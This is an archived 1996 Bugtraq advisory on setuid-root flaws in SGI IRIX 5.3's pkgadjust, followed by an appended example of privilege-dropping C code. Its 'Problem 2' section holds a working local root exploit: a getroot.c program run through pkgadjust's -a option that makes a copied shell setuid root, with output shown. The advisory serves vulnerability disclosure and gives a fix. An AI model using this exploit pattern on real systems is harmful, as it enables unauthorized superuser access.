Bugtraq mailing list archives

Security hole in SGI package installation system


From: hhui () stardot net (Hui-Hui Hu)
Date: Sat, 27 Jan 1996 10:57:02 -0500


There are many major security holes in SGI's package installation system
for IRIX 5.3. The code appears to have been written without proper
consideration of the implications of setuid. Any user can gain superuser
access as well as overwrite-to-destroy files.

The main program that pkg{info,rm,etc} call is /usr/pkg/bin/pkgadjust,
which is setuid root.

PROGRAM.  pkgadjust (from eoe2.sw.oampkg)
AFFECTS.  SGI IRIX 5.3. IRIX 5.2 is not affected; unsure about IRIX 6.
REQUIRED. Account on server
RISK.     superuser
AUTHOR.   Tung-Hui Hu <hhui () stardot net>

---

PROBLEM 1. pkgadjust will allow any user to overwrite any file because it
allows one to set via command line:

     -o        write debugging output to <file> rather than to stderr

Since pkgadjust does not check for ownership, etc. this will destroy the
file, leading to a denial of service/removal of authorization checks.

---

PROBLEM 2. pkgadjust will allow any user to gain superuser access.
One can set programs to list installed packages via command line options

              -a <cmd> normally 'versions long' command line
              -b <cmd> normally 'versions -v' command line

This is trivially exploited:

% cat > getroot.c
int main() { setuid(0); chown("sh",0,0); chmod("sh",04755); return 0; }
% cc getroot.c -o getroot
% cp /bin/sh sh
% ls -la sh
-rwxr-xr-x    1 hhui     user      140784 Jan  5 20:52 sh
% /usr/pkg/bin/pkgadjust -f -a getroot
scanning inst-database

updating pkginfo-files
........................................^C
% ls -la sh
-rwsr-xr-x    1 root     sys       140784 Jan  5 20:52 sh
% panic

---

FIX.

# chmod 700 /usr/pkg/bin/pkgadjust

DISCUSSION. No sermons here, but I really doubt the program was
written for setuid. Since most users can't write to the lockfile
in /var/sadm, many pkg* commands are unavailable. I also found
these files improperly permissioned and would recommend removing setuid:

-rwsr-xr-x    1 root     sys          838 Sep 27 11:27 /usr/lib/X11/app-defaults/ISDN
-rws--x--x    1 root     sys        18632 Sep 27 10:59 /usr/pkg/bin/abspath


Tung-Hui Hu         / '97 Comparative Literature / Princeton Universe
hhui () stardot com   / the STATIC: http://www.stardot.com/~hhui/static
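Added example, not code from this post or from SGI: the privilege handling a setuid helper such as pkgadjust would need before it acts on the caller-supplied -o <file> and -a <cmd> arguments described above. Function names are hypothetical.

```c
/* Privilege handling a setuid helper such as pkgadjust needs before using
 * anything the caller named on its command line (-o <file>, -a <cmd>).
 * Added example, not SGI's code; the function names are hypothetical. */
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <unistd.h>
/* Permanently drop to the real (invoking) uid/gid and verify the drop.
 * Returns 0 on success, -1 if a step fails or root can be regained. */
int drop_privileges(void)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();
    if (setgid(rgid) != 0)      /* group first, while we still may */
        return -1;
    if (setuid(ruid) != 0)
        return -1;
    if (ruid != 0 && setuid(0) == 0) /* must not be able to climb back */
        return -1;
    return (geteuid() == ruid && getegid() == rgid) ? 0 : -1;
}

/* PROBLEM 1: open the "-o <file>" path only after the drop, so the kernel
 * applies the caller's own permissions instead of root's. */
int open_debug_output(const char *path)
{
    if (drop_privileges() != 0)
        return -1;
    return open(path, O_WRONLY | O_CREAT | O_APPEND, 0600);
}

/* PROBLEM 2: the "-a <cmd>" program must never run with euid 0. Fork,
 * drop privileges in the child, then exec. Returns the child's exit
 * status, or -1 on error (exec failure shows up as 127). */
int run_unprivileged(char *const argv[])
{
    int status;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (drop_privileges() != 0)
            _exit(126);
        execvp(argv[0], argv);
        _exit(127);
    }
    if (waitpid(pid, &status, 0) != pid)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```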


